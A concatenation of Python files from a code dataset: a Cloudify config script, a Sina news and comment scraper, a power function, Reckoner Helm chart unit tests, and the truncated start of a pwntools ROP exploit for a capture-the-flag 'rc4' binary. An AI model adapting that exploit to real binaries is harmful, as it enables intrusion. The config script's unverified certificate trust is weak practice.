'.format(output))\n ctx.logger.debug('error: {0} '.format(error))\n ctx.logger.debug('process.returncode: {0} '.format(process.returncode))\n\n if process.returncode:\n ctx.logger.error('Running `{0}` returns {1} error: {2}.'\n .format(repr(command), process.returncode,\n repr(error)))\n return False\n\n return output\n\n\nif __name__ == '__main__':\n\n linux_distro = inputs.get('linux_distro', 'centos')\n\n cfy_deployment = \\\n inputs.get('cfy_deployment', ctx.deployment.id)\n\n cfy_instance = \\\n inputs.get('cfy_instance', ctx.instance.id)\n\n cfy_user = \\\n inputs.get('cfy_user', 'admin')\n\n cfy_pass = \\\n inputs.get('cfy_password', 'admin')\n\n cfy_tenant = \\\n inputs.get('cfy_tenant', 'default_tenant')\n\n cfy_host = \\\n inputs.get('cfy_host', 'localhost')\n\n cfy_ssl = \\\n inputs.get('cfy_ssl', False)\n\n ctx.logger.info(\"create cloudify manager config\")\n\n # services config\n with open(os.path.expanduser('~') + \"/cfy.json\", 'w') as outfile:\n outfile.write(\"{\" + CONFIG.format(\n cfy_deployment,\n cfy_instance,\n cfy_tenant,\n cfy_pass,\n cfy_user,\n cfy_host if not cfy_ssl else \"https://\" + cfy_host) + \"}\")\n\n if not linux_distro:\n distro, _, _ = \\\n platform.linux_distribution(full_distribution_name=False)\n linux_distro = distro.tolower()\n\n if cfy_ssl:\n ctx.logger.info(\"Set certificate as trusted\")\n\n # cert config\n _, temp_cert_file = tempfile.mkstemp()\n\n with open(temp_cert_file, 'w') as cert_file:\n cert_file.write(\"# cloudify certificate\\n\")\n cert_file.write(ssl.get_server_certificate((\n cfy_host, 443)))\n\n if 'centos' in linux_distro:\n execute_command([\n 'sudo', 'bash', '-c',\n 'cat {} >> /etc/pki/tls/certs/ca-bundle.crt'\n .format(temp_cert_file)\n ])\n else:\n raise NonRecoverableError('Unsupported platform.')\n","sub_path":"examples/cluster_blueprint/scripts/kubernetes/config-create.py","file_name":"config-create.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"395384824","text":"import os\nimport requests\nfrom lxml import etree\nimport json\nimport re\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\nimport logging\nimport traceback\nimport uuid\nimport sys\nfrom with_hdfs import HdfsClient\n\nsys.setrecursionlimit(3000)\n\n\n# 获取文件名称\nname = os.path.basename(__file__)\nname = str(name).split('.')[0]\n# 设置日志记录\nLOG_FORMAT = \"%(asctime)s %(filename)s %(levelname)s %(lineno)d %(message)s \" # 配置输出日志格式\nDATE_FORMAT = '%Y-%m-%d %H:%M:%S ' # 配置输出时间的格式,注意月份和天数不要搞乱了\n# file_name = r\"./{}-{}.log\".format(name, str(datetime.now()).split(' ')[0])\nlogging.basicConfig(level=logging.WARNING,\n format=LOG_FORMAT,\n datefmt=DATE_FORMAT,\n # filename=file_name, # 有了filename参数就不会直接输出显示到控制台,而是直接写入文件\n )\n# headle = logging.FileHandler(filename=file_name, encoding='utf-8')\nlogger = logging.getLogger()\n# logger.addHandler(headle)\n\n\nclass Spider(object):\n \"\"\"\n 这是一个爬虫模板\n \"\"\"\n def __init__(self, file_path, comment_path):\n\n self.headers_one = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36'\n }\n\n a = str(datetime.now())\n hour = a.split(' ')[-1].split(':')[0]\n num = int(hour) / 3\n num = int(num) * 3\n if num == 0: # 对于凌晨 0 点的判断\n # 时间判断部分\n date = datetime.now() - timedelta(days=1)\n news_start_time = str(date).split(' ')[0]\n yesterday = datetime.now() - timedelta(days=1) # 昨天时间\n yesterday = str(yesterday).split(' ')[0]\n else:\n # 时间判断部分\n date = datetime.now() - timedelta(days=0)\n news_start_time = str(date).split(' ')[0]\n yesterday = datetime.now() - timedelta(days=0) # 昨天时间\n yesterday = str(yesterday).split(' ')[0]\n # 定义开始时间 y-m-d 离现在时间远 news_start_time\n self.start_time = news_start_time\n # 定义结束时间 y-m-d 离现在时间近 yesterday\n self.end_time = yesterday\n logging.log(31, '爬取时间段:{}到{}'.format(self.start_time, self.end_time))\n # 定义评论的抓取时间范围\n # self.comment_start_time = yesterday # 一天回复\n # self.comment_start_time = '2019-08-01' # 一天回复\n self.comment_start_time = '' # 不限定时间回复\n self.comment_end_time = yesterday\n # self.comment_end_time = yesterday\n # 标记爬虫工作\n self.is_work = True\n self.file_name_time = self.get_file_name_time()\n self.commnet_port_url = 'http://comment.sina.com.cn/page/info?version=1&format=json&channel=ty&newsid=comos-{}&group=0&compress=0&ie=utf-8&oe=utf-8&page={}&page_size=10&t_size=3&h_size=3&thread=1&callback=jsonp_1542676393124&_=1542676393124'\n self.page_num = 1\n self.file_path = file_path\n self.comment_apth = comment_path\n self.hdfsclient = HdfsClient(url='http://jq-chance-05:9870', user='dpp-executor')\n hour = str(datetime.now()).split(' ')[-1].split(':')[0]\n if str(hour) != '00':\n two_hour_ago = int(hour) - 2\n if len(str(two_hour_ago)) == 1:\n two_hour_ago = '0' + str(two_hour_ago)\n self.hour_name = str(two_hour_ago) + '_' + str(hour)\n else:\n self.hour_name = '22_24'\n self.hdfsclient.makedirs('{}/{}/{}'.format(self.file_path, self.file_name_time.split(' ')[0].replace('-', ''), self.hour_name)) # 创建每日文件夹\n self.hdfsclient.makedirs('{}/{}/{}'.format(self.comment_apth, self.file_name_time.split(' ')[0].replace('-', ''), self.hour_name)) # 创建每日文件夹\n self.time_time = str(time.time()).split('.')[0]\n\n def get_list_page(self, url):\n logger.log(31, '列表页url: ' + url)\n response = requests.get(url, headers=self.headers_one)\n data = json.loads(response.text[46:-14])\n list_data = data['result']['data']\n for li_data in list_data:\n news_url = li_data['url']\n ctime = li_data['ctime']\n time_local = time.localtime(float(ctime))\n # 转换成新的时间格式(2016-05-05 20:28:54)\n dt = time.strftime(\"%Y-%m-%d %H:%M:%S\", time_local) # \"%Y-%m-%d %H:%M:%S\"\n #\n try:\n self.get_news_info(news_url, '', 'http://sports.sina.com.cn/roll/index.shtml#pageid=13&lid=2503&k=&num=50&page=1', dt)\n except:\n logger.error(traceback.format_exc())\n\n def get_news_info(self, url, news_type, page_list, date_all):\n logger.log(31, '新闻url: ' + url)\n item = dict()\n response = requests.get(url, headers=self.headers_one)\n try:\n data = etree.HTML(response.content.decode())\n # 网站\n item['platform'] = '新浪新闻'\n # 标题\n try:\n title = data.xpath('.//h1[@class=\"main-title\"]/text()')[0]\n except:\n title = data.xpath('.//h2/text()')[0]\n item['title'] = title\n # date_all = data.xpath('.//div[@class=\"date-source\"]/span/text()')[0].replace('年', '-').replace('月', '-').replace('日', '')\n date = date_all.split(' ')[0]\n news_time = date_all.split(' ')[1]\n # print(date)\n item['date'] = date\n item['time'] = news_time\n # 文章来源\n try:\n article_source = data.xpath('.//div[@class=\"date-source\"]/a/text()')[0]\n except:\n article_source = data.xpath('.//p[@class=\"from\"]/span[2]//text()')\n article_source = ''.join(article_source)\n item['article_source'] = article_source\n # article_author\n try:\n article_author = data.xpath('.//div[@class=\"show_author\"]/text()')\n except:\n article_author = ''\n if article_author:\n item['article_author'] = article_author[0]\n else:\n item['article_author'] = ''\n # 内容\n try:\n content = data.xpath('.//div[@id=\"article_content\"]/div[1]/div/p/text()')\n except:\n content = data.xpath('.//em[@class=\"vdiCont\"]//text()')\n content = ''.join(content)\n # 翻页数据\n next_page = data.xpath('.//div[@data-sudaclick=\"content_pagination_p\"]/a/@href')\n if len(next_page) > 3:\n next_page = next_page[1:][:-2]\n for page_url in next_page:\n print('获取翻页数据')\n next_content = self.get_next_page(page_url)\n content = content + next_content\n\n item['content'] = content\n\n # 从接口处获取评论数\n news_id = re.search('(\\w{7}\\d{7})', url).group(0)\n try:\n comment_count = self.get_commnet_count(news_id)\n except AttributeError:\n comment_count = '0'\n item['comments_count'] = comment_count\n item['clicks'] = ''\n item['views'] = ''\n item['likes'] = ''\n item['keyword'] = ''\n item['article_url'] = url # 文章详情URL\n item['dislikes'] = '' # 踩人数\n item['series_url'] = '' # 车系首页\n item['list_url'] = page_list # 文章列表URL\n # item['article_type'] = news_type # 文章类型\n item['article_type_1st'] = news_type # 文章类型\n item['article_type_2nd'] = '' # 文章类型\n item['insert_time'] = str(datetime.now()).split('.')[0] # 初始爬取时间\n item['update_time'] = str(datetime.now()).split('.')[0] # 最后爬取时间\n content_id = url.split('/')[-1].split('.')[0].split('_')[-1].split('-')[-1]\n # content_id = re.search('\\d{5,8}', content_id).group(0)\n item['content_id'] = str(content_id) # 文章id\n item['topic_id'] = str(content_id) # 主贴id\n item['author_id'] = '' # 作者id\n item['file_code'] = '17'\n item['reposts_count'] = ''\n # 做时间判断部分---------------\n get_news_time = time.mktime(time.strptime(date, \"%Y-%m-%d\"))\n end_time = time.mktime(time.strptime(self.end_time, \"%Y-%m-%d\"))\n if self.start_time != '':\n start_time = time.mktime(time.strptime(self.start_time, \"%Y-%m-%d\"))\n else:\n start_time = time.mktime(time.strptime('2010-1-1', \"%Y-%m-%d\"))\n if float(get_news_time) < float(start_time):\n self.is_work = False\n return\n\n if float(start_time) <= float(get_news_time) <= float(end_time):\n self.write_news_jsonfile(item)\n if int(comment_count) > 0:\n self.is_get_comment = True\n self.get_comments_info(news_id, title, date, news_time, url)\n except IndexError:\n time.sleep(5)\n logger.error('网页请求404 url: {}, {}'.format(url, traceback.format_exc()))\n\n # 获取翻页数据\n def get_next_page(self, url):\n response = requests.get(url, headers=self.headers_one)\n try:\n data = etree.HTML(response.content)\n # 内容\n content = data.xpath('.//div[@id=\"article_content\"]/div[1]/div/p/text()')\n content = ''.join(content)\n return content\n except:\n content = ''\n return content\n\n # 获取评论数\n def get_commnet_count(self, news_id):\n response = requests.get(self.commnet_port_url.format(news_id, str(1)))\n data = response.content.decode()\n data = data[20:][:-1]\n # print(11111,data)\n data = json.loads(data)\n # print(222222,data)\n # data = re.search('\"qreply\": \\d{0,9}', data).group(0)\n try:\n comment_count = data['result']['count']['show']\n except:\n comment_count = 0\n return comment_count\n\n # 获取评论信息\n def get_comments_info(self, news_id, title, source_date, source_time, source_url, page_id=\"1\"):\n item = {}\n url = self.commnet_port_url.format(news_id, page_id)\n response = requests.get(url)\n data = response.content.decode()\n # data = re.search(r'{\"result.*}\\)', data).group(0)\n data = data[20:][:-1]\n data = json.loads(data)\n comments_list = data['result']['cmntlist']\n if comments_list:\n for comment in comments_list:\n item['platform'] = '新浪新闻'\n item['source_date'] = source_date\n item['source_time'] = source_time\n date_all = comment['time']\n date = date_all.split(' ')[0]\n commnet_time = date_all.split(' ')[1]\n item['date'] = date\n item['time'] = commnet_time\n # 评论部分做时间判断部���---------------\n get_news_time = time.mktime(time.strptime(str(date), \"%Y-%m-%d\"))\n end_time = time.mktime(time.strptime(self.comment_end_time, \"%Y-%m-%d\"))\n if self.comment_start_time != '':\n start_time = time.mktime(time.strptime(self.comment_start_time, \"%Y-%m-%d\"))\n else:\n start_time = time.mktime(time.strptime('2010-1-1', \"%Y-%m-%d\"))\n if float(get_news_time) < float(start_time):\n self.is_get_comment = False # 返回的回答消息是按时间进行排序的,所以当时间小于指定时间时,就停止爬取,\n break\n elif float(start_time) <= float(get_news_time) <= float(end_time):\n\n item['title'] = title\n author = comment['nick']\n item['author'] = author\n item['author_id'] = comment['uid'] # 用户id\n content = comment['content']\n\n item['content'] = content\n item['floor'] = ''\n item['keyword'] = ''\n item['source_url'] = source_url\n comment_url = 'http://comment5.news.sina.com.cn/comment/skin/default.html?channel=ty&newsid=comos-{}&group=0'.format(\n news_id)\n item['comment_url'] = comment_url\n item['views'] = ''\n item['comments_count'] = ''\n likes = comment['agree']\n item['likes'] = likes\n item['dislikes'] = '' # 踩人数\n item['insert_time'] = str(datetime.now()).split('.')[0] # 初始爬取时间\n item['update_time'] = str(datetime.now()).split('.')[0] # 最后爬取时间\n item['content_id'] = str(uuid.uuid4()).replace('-', '')\n topic_id = source_url.split('/')[-1].split('.')[0].split('_')[-1].split('-')[-1]\n # topic_id = re.search('\\d{5,8}', topic_id).group(0)\n item['topic_id'] = topic_id # 主贴id\n item['file_code'] = '31'\n item['reposts_count'] = ''\n self.write_comment_jsonfile(item)\n if self.is_get_comment:\n self.page_num += 1\n self.get_comments_info(news_id, title, source_date, source_time, source_url,page_id=str(self.page_num))\n else:\n self.page_num = 1\n logger.log(31, '评论抓取完毕 '+ url)\n # ------------------------------------------------新能源模块--------------------------------------------------------\n\n def get_file_name_time(self):\n a = str(datetime.now())\n hour = a.split(' ')[-1].split(':')[0]\n num = int(hour) / 3\n num = int(num) * 3\n if num == 0:\n num = 24\n a = str(datetime.now() - timedelta(days=1)) # 昨天时间\n num = a.split(' ')[0] + ' ' + str(num)\n return num\n\n def write_news_jsonfile(self, item):\n item = json.dumps(dict(item), ensure_ascii=False) + '\\n'\n # print('写入json数据')\n # with open('./../sina/17_sina_news.json', 'ab') as f:\n # f.write(item.encode(\"utf-8\"))\n self.hdfsclient.new_write('{}/{}/{}/17_{}_{}_sina_news.json'.format(self.file_path, self.file_name_time.split(' ')[0].replace('-', ''), self.hour_name, str(datetime.now()).split(' ')[0].replace('-', '_'), self.time_time), item,encoding='utf-8')\n\n def write_comment_jsonfile(self, item):\n item = json.dumps(dict(item), ensure_ascii=False) + '\\n'\n # with open('./../sina/31_sina_comment.json', 'ab') as f:\n # f.write(item.encode(\"utf-8\"))\n self.hdfsclient.new_write('{}/{}/{}/31_{}_{}_sina_comment.json'.format(self.comment_apth, self.file_name_time.split(' ')[0].replace('-', ''), self.hour_name, str(datetime.now()).split(' ')[0].replace('-', '_'), self.time_time), item,encoding='utf-8')\n\n def run(self):\n for i in range(1, 20):\n url = 'http://feed.mix.sina.com.cn/api/roll/get?pageid=13&lid=2503&k=&num=50&page={}&r=0.6019004029484454&callback=jQuery311016308312964736538_1566799251373&_=1566799251388'.format(str(i))\n self.get_list_page(url)\n\n\nif __name__ == \"__main__\":\n print(sys.argv)\n file_path = sys.argv[1]\n comment_path = sys.argv[2]\n spider = Spider(file_path, comment_path)\n try:\n spider.run()\n except:\n logger.critical(traceback.format_exc())\n\n logger.log(31, '程序结束......')\n","sub_path":"Dai/sina/sina_hour.py","file_name":"sina_hour.py","file_ext":"py","file_size_in_byte":15986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"459765359","text":"def myPow( x, n):\n if n == 0:\n return 1\n elif n < 0:\n x = 1/x\n n = -n\n ans = 1.0\n while n > 0:\n if n&1 :\n ans *= x\n x *= x\n n >>= 1\n return ans\nx=float(input());\nn=int(input());\nprint('%.5f'%myPow(x,n))","sub_path":"Code/CodeRecords/2070/60785/318858.py","file_name":"318858.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"149794464","text":"# Copyright 2019 FairwindsOps Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Test the chart functions directly\"\"\"\nimport unittest\nimport mock\nfrom reckoner.chart import Chart, ChartResult\nfrom reckoner.command_line_caller import Response\nfrom reckoner.exception import ReckonerCommandException\nfrom reckoner.yaml.handler import Handler\nfrom io import StringIO\n\n\n@mock.patch('reckoner.chart.Repository')\n@mock.patch('reckoner.chart.Config')\n# I have to strictly design the mock for Reckoner due to the nature of the\n# key/val class setup. If the class actually had attributes then this\n# would be more easily mockable\n@mock.patch('reckoner.chart.call')\nclass TestChartHooks(unittest.TestCase):\n def get_chart(self, *args):\n chart = Chart(\n {'name': {\n 'hooks': {\n 'pre_install': [\n 'omg',\n ],\n 'post_install': [\n 'fetchez --la-vache',\n 'mooooooooo!',\n ]\n }\n }\n },\n None,\n )\n chart.config.dryrun = False\n\n return chart\n\n def test_execution_directory(self, mock_cmd_call, *args):\n \"\"\"Assert that we're executing in the same directory as the course yml\"\"\"\n _path = '/path/where/course/lives/'\n _fake_command = 'fake --command'\n chart = self.get_chart()\n chart.hooks = {\n 'pre_install': [\n _fake_command\n ]\n }\n chart.config.course_base_directory = _path\n mock_cmd_call.side_effect = [Response(command_string=_fake_command, stderr='err-output', stdout='output', exitcode=0)]\n chart.run_hook('pre_install')\n mock_cmd_call.assert_called_with(_fake_command, shell=True, executable='/bin/bash', path=_path)\n\n def test_caught_exceptions(self, mock_cmd_call, *args):\n \"\"\"Assert that we raise the correct error if call() blows up\"\"\"\n chart = self.get_chart()\n mock_cmd_call.side_effect = [Exception('holy smokes, an error!')]\n with self.assertRaises(ReckonerCommandException):\n chart.run_hook('pre_install')\n\n def test_raises_error_when_any_hook_fails(self, mock_cmd_call, *args):\n \"\"\"Assert that we raise an error when commands fail and we don't run subsequent commands.\"\"\"\n good_response = Response(\n exitcode=0,\n stderr='',\n stdout='some info',\n command_string='my --command',\n )\n bad_response = Response(\n exitcode=127,\n stderr='found exit code 127 set in test mock',\n stdout='here would be stdout',\n command_string='mock --command',\n )\n\n chart = self.get_chart()\n chart.hooks['pre_install'] = ['', '', '']\n\n mock_cmd_call.side_effect = [good_response, bad_response, good_response]\n\n with self.assertRaises(ReckonerCommandException):\n chart.run_hook('pre_install')\n\n self.assertEqual(mock_cmd_call.call_count, 2, \"Call two should fail and not run the third hook.\")\n\n @mock.patch('reckoner.chart.logging', autospec=True)\n def test_logging_info_and_errors(self, mock_logging, mock_cmd_call, *args):\n \"\"\"Verify we log the right info when call() fails and succeeds\"\"\"\n chart = self.get_chart()\n\n # This is actually not a good test because it tightly couples the\n # implementation of logging to the test. Not sure how to do this any\n # better.\n # What I really want to test is that we're sending our info to the cli\n # user when hooks run.\n bad_response = mock.Mock(Response,\n exitcode=1,\n stderr='some error',\n stdout='some info',\n command_string='my --command')\n good_response = mock.Mock(Response,\n exitcode=0,\n stderr='',\n stdout='some info',\n command_string='my --command')\n mock_cmd_call.side_effect = [good_response]\n chart.run_hook('pre_install')\n mock_logging.error.assert_not_called()\n mock_logging.info.assert_called()\n\n mock_cmd_call.side_effect = [good_response, bad_response]\n mock_logging.reset_mock()\n with self.assertRaises(ReckonerCommandException):\n chart.run_hook('post_install')\n mock_logging.error.assert_called()\n mock_logging.info.assert_called()\n mock_logging.log.assert_called()\n\n def test_skipping_due_to_dryrun(self, mock_cmd_call, *args):\n \"\"\"Verify that we do NOT run the actual calls when dryrun is enabled\"\"\"\n chart = self.get_chart()\n chart.config.dryrun = True\n chart.run_hook('pre_install')\n mock_cmd_call.assert_not_called()\n\n def test_hooks_support_list(self, mock_cmd_call, *args):\n \"\"\"Assert that hooks can be defined as lists\"\"\"\n chart = self.get_chart()\n chart.hooks = {\n 'pre_install': [\n 'works',\n 'twice works',\n ]\n }\n\n mock_cmd_call.side_effect = [\n Response(command_string='command', stderr='err-output', stdout='output', exitcode=0),\n Response(command_string='command', stderr='err-output', stdout='output', exitcode=0),\n ]\n chart.run_hook('pre_install')\n self.assertTrue(mock_cmd_call.call_count == 2)\n\n def test_hooks_support_strings(self, mock_cmd_call, *args):\n \"\"\"Assert that hooks can be defined as a string\"\"\"\n chart = self.get_chart()\n chart.hooks = {\n 'pre_install': 'works'\n }\n\n mock_cmd_call.side_effect = [Response(command_string='command', stderr='err-output', stdout='output', exitcode=0)]\n chart.run_hook('pre_install')\n mock_cmd_call.assert_called_once()\n\n\n# @mock.patch('reckoner.chart.Repository')\n# @mock.patch('reckoner.chart.Config')\n# # I have to strictly design the mock for Reckoner due to the nature of the\n# # key/val class setup. If the class actually had attributes then this\n# # would be more easily mockable\n# @mock.patch('reckoner.chart.call')\nclass TestCharts(unittest.TestCase):\n \"\"\"Test charts\"\"\"\n\n @mock.patch('reckoner.chart.os')\n def test_interpolation_of_env_vars(self, environMock):\n chart = Chart({'name': {'values': {}}}, None)\n chart.config.dryrun = False\n\n chart.args = ['thing=${environVar}', 'another=$environVar']\n environMock.environ = {'environVar': 'asdf'}\n\n chart._check_env_vars()\n self.assertEqual(chart.args[0], 'thing=asdf')\n self.assertEqual(chart.args[1], 'another=asdf')\n\n @mock.patch('reckoner.chart.os')\n def test_interpolation_of_missing_env_vars(self, environMock):\n chart = Chart({'name': {'values': {}}}, None)\n chart.config.dryrun = False\n\n chart.args = ['thing=${environVar}']\n environMock.environ = {}\n\n with self.assertRaises(Exception):\n chart._check_env_vars()\n\n @mock.patch('reckoner.chart.os')\n def test_interpolation_of_env_vars_kube_deploy_spec(self, environMock):\n chart = Chart({'name': {'values': {}}}, None)\n chart.config.dryrun = False\n\n chart.args = ['thing=$(environVar)']\n environMock.environ = {}\n\n chart._check_env_vars()\n self.assertEqual(chart.args[0], 'thing=$(environVar)')\n\n @mock.patch('reckoner.chart.Repository')\n def test_chart_install(self, repositoryMock):\n repo_mock = repositoryMock()\n repo_mock.chart_path = \"\"\n helm_client_mock = mock.MagicMock()\n\n chart = Chart({'nameofchart': {'namespace': 'fakenamespace', 'set-values': {}}}, helm_client_mock)\n chart.config.dryrun = False\n\n chart.install()\n helm_client_mock.upgrade.assert_called_once()\n upgrade_call = helm_client_mock.upgrade.call_args\n self.assertEqual(upgrade_call[0][0], ['nameofchart', '', '--namespace', 'fakenamespace'])\n\n @mock.patch('reckoner.chart.Repository')\n def test_chart_install_with_plugin(self, repositoryMock):\n repo_mock = repositoryMock()\n repo_mock.chart_path = \"\"\n helm_client_mock = mock.MagicMock()\n\n chart = Chart({'nameofchart': {'namespace': 'fakenamespace', 'plugin': 'someplugin', 'set-values': {}}}, helm_client_mock)\n chart.config.dryrun = False\n\n chart.install()\n helm_client_mock.upgrade.assert_called_once()\n upgrade_call = helm_client_mock.upgrade.call_args\n self.assertEqual(upgrade_call[0][0], ['nameofchart', '', '--namespace', 'fakenamespace'])\n self.assertEqual(upgrade_call[1], {'plugin': 'someplugin'})\n\n\nclass TestChartResult(unittest.TestCase):\n def test_initialize(self):\n c = ChartResult(\n name=\"fake-result\",\n failed=False,\n error_reason=\"\",\n )\n\n assert c\n\n def test_string_output(self):\n c = ChartResult(name=\"fake-result\", failed=False, error_reason=\"oops\")\n string_output = c.__str__()\n self.assertIn(\"fake-result\", string_output)\n self.assertIn(\"Succeeded\", string_output)\n self.assertIn(c.error_reason, string_output)\n\n def test_status_string(self):\n c = ChartResult(name=\"railed-result\", failed=True, error_reason=\"\")\n self.assertEqual(c.status_string, \"Failed\")\n c.failed = False\n self.assertEqual(c.status_string, \"Succeeded\")\n\n\nclass TestTemporaryValuesFiles(unittest.TestCase):\n \"\"\"Test the cases for Temporary values files\"\"\"\n\n def test_chart_initializes_empty_file_paths(self):\n \"\"\"Assert that we initialize the empty list for new charts\"\"\"\n chart = Chart({\"fake-chart\": {}}, None)\n self.assertEqual(chart._temp_values_file_paths, [])\n\n def test_chart_creates_temp_value_files(self):\n chart = Chart({\"fake-chart\": {}}, None)\n chart.values = {\"fake-key\": \"fake-value\"}\n self.assertEqual(len(chart._temp_values_file_paths), 0)\n\n chart.build_temp_values_files()\n self.assertEqual(len(chart._temp_values_file_paths), 1)\n\n @mock.patch('reckoner.chart.os', autospec=True)\n def test_remove_temp_files(self, mock_os):\n \"\"\"Assert that a temp file in the list has os.remove called against it\"\"\"\n chart = Chart({\"fake-chart\": {}}, None)\n chart._temp_values_file_paths.append('non/existent-path')\n chart.clean_up_temp_files()\n mock_os.remove.assert_called_once()\n\n\nclass TestBuildSetArguments(unittest.TestCase):\n \"\"\"Test the build set args for helm chart\"\"\"\n\n def setUp(self):\n self.chart_object = {\n \"fake-chart\": {\n \"set-values\": {\n \"keyone\": \"valueone\",\n }\n }\n }\n\n def test_flat_key_values(self):\n chart = Chart(self.chart_object, None)\n\n self.assertEqual(chart.args, [], \"self.args should be empty before running\")\n chart.build_set_arguments()\n self.assertEqual(chart.args, [\"--set\", \"keyone=valueone\"], \"Expected build_set_arguments to build --set args correctly.\")\n\n def test_dicts(self):\n chart = Chart(self.chart_object, None)\n chart.set_values = {\n \"levelone\": {\n \"leveltwo\": \"valuetwo\",\n }\n }\n\n chart.build_set_arguments()\n self.assertEqual(chart.args, [\"--set\", \"levelone.leveltwo=valuetwo\"])\n\n chart.args = []\n chart.set_values = {\n \"levelone\": {\n \"leveltwo\": {\n \"levelthree\": {\n \"levelfour\": \"value four\",\n }\n }\n }\n }\n chart.build_set_arguments()\n self.assertEqual(chart.args, [\"--set\", \"levelone.leveltwo.levelthree.levelfour=value four\"])\n\n def test_yaml_loaded_integration(self):\n yaml_file = StringIO('''\n---\ncharts:\n my-chart:\n set-values:\n keyone: value one\n keytwo:\n keythree: value three\n keyfour:\n - --settings\n keyfive:\n - --one\n - --two\n deeplynested_objects:\n - name: hiya\n another:\n nested: value\n nesting: value\n - non: conforming\n lists:\n - more lists\n - and more\n - and:\n a_random_dict: value\n''')\n course = Handler.load(yaml_file)\n chart = Chart(course[\"charts\"], None)\n chart.build_set_arguments()\n self.assertEqual(chart.args, [\n \"--set\", \"keyone=value one\",\n \"--set\", \"keytwo.keythree=value three\",\n \"--set\", \"keytwo.keyfour[0]=--settings\",\n \"--set\", \"keyfive[0]=--one\",\n \"--set\", \"keyfive[1]=--two\",\n \"--set\", \"deeplynested_objects[0].name=hiya\",\n \"--set\", \"deeplynested_objects[0].another.nested=value\",\n \"--set\", \"deeplynested_objects[0].another.nesting=value\",\n \"--set\", \"deeplynested_objects[1].non=conforming\",\n \"--set\", \"deeplynested_objects[1].lists[0]=more lists\",\n \"--set\", \"deeplynested_objects[1].lists[1]=and more\",\n \"--set\", \"deeplynested_objects[1].lists[2].and.a_random_dict=value\",\n ])\n\n def test_null_value(self):\n chart = Chart(self.chart_object, None)\n chart.set_values = {\n \"testnull\": None,\n }\n\n chart.build_set_arguments()\n self.assertEqual(chart.args, [\n \"--set\", \"testnull=null\",\n ])\n\n\nclass TestBuildSetStringsArguments(unittest.TestCase):\n \"\"\"Test building of set strings\"\"\"\n\n def setUp(self):\n self.chart_object = {\n \"fake-chart\": {\n \"values-strings\": {\n \"keyone\": \"valueone\",\n }\n }\n }\n\n def test_flat_key_values(self):\n chart = Chart(self.chart_object, None)\n\n self.assertEqual(chart.args, [], \"self.args should be empty before running\")\n chart.build_set_string_arguments()\n self.assertEqual(chart.args, [\"--set-string\", \"keyone=valueone\"], \"Expected build_set_arguments to build --set args correctly.\")\n\n def test_dicts(self):\n chart = Chart(self.chart_object, None)\n chart.values_strings = {\n \"levelone\": {\n \"leveltwo\": \"valuetwo\",\n }\n }\n\n chart.build_set_string_arguments()\n self.assertEqual(chart.args, [\"--set-string\", \"levelone.leveltwo=valuetwo\"])\n\n chart.args = []\n chart.values_strings = {\n \"levelone\": {\n \"leveltwo\": {\n \"levelthree\": {\n \"levelfour\": \"value four\",\n }\n }\n }\n }\n chart.build_set_string_arguments()\n self.assertEqual(chart.args, [\"--set-string\", \"levelone.leveltwo.levelthree.levelfour=value four\"])\n\n def test_yaml_loaded_integration(self):\n yaml_file = StringIO('''\n---\ncharts:\n my-chart:\n values-strings:\n keyone: value one\n keytwo:\n keythree: value three\n keyfour:\n - --settings\n keyfive:\n - --one\n - --two\n deeplynested_objects:\n - name: hiya\n another:\n nested: value\n nesting: value\n - non: conforming\n lists:\n - more lists\n - and more\n - and:\n a_random_dict: value\n''')\n course = Handler.load(yaml_file)\n chart = Chart(course[\"charts\"], None)\n chart.build_set_string_arguments()\n self.assertEqual(chart.args, [\n \"--set-string\", \"keyone=value one\",\n \"--set-string\", \"keytwo.keythree=value three\",\n \"--set-string\", \"keytwo.keyfour[0]=--settings\",\n \"--set-string\", \"keyfive[0]=--one\",\n \"--set-string\", \"keyfive[1]=--two\",\n \"--set-string\", \"deeplynested_objects[0].name=hiya\",\n \"--set-string\", \"deeplynested_objects[0].another.nested=value\",\n \"--set-string\", \"deeplynested_objects[0].another.nesting=value\",\n \"--set-string\", \"deeplynested_objects[1].non=conforming\",\n \"--set-string\", \"deeplynested_objects[1].lists[0]=more lists\",\n \"--set-string\", \"deeplynested_objects[1].lists[1]=and more\",\n \"--set-string\", \"deeplynested_objects[1].lists[2].and.a_random_dict=value\",\n ])\n\n def test_null_value(self):\n chart = Chart(self.chart_object, None)\n chart.values_strings = {\n \"testnull\": None,\n }\n\n chart.build_set_string_arguments()\n self.assertEqual(chart.args, [\n \"--set-string\", \"testnull=null\",\n ])\n","sub_path":"reckoner/tests/test_chart.py","file_name":"test_chart.py","file_ext":"py","file_size_in_byte":17318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"622208035","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom pwn import *\nfrom time import sleep\nimport sys\ncontext.binary = \"./rc4\"\n\nelf = ELF(\"./rc4\", checksec = False)\nlocal = sys.argv[1] == \"l\"\nif local:\n io = process(\"./rc4\")\n libc = elf.libc\nelse:\n # io = remote(\"118.31.17.25\", 20011)\n io = process(\"./rc4\", env = {\"LD_PRELOAD\": \"./libc.so.6\"})\n libc = ELF(\"./libc.so.6\", checksec = False)\n\n# context.log_level = \"debug\"\ndef static_key():\n io.sendlineafter(\"> \", \"a\")\n io.sendlineafter(\"> \", \"b\")\n return io.recvuntil(\"Crypto Test!\", drop = True).strip()\n\ndef rop(canary):\n prbp = 0x0000000000400920\n prdi = 0x0000000000401283\n leaveret = 0x0000000000400b6e\n base = elf.bss() + 0x300\n\n io.sendlineafter(\"> 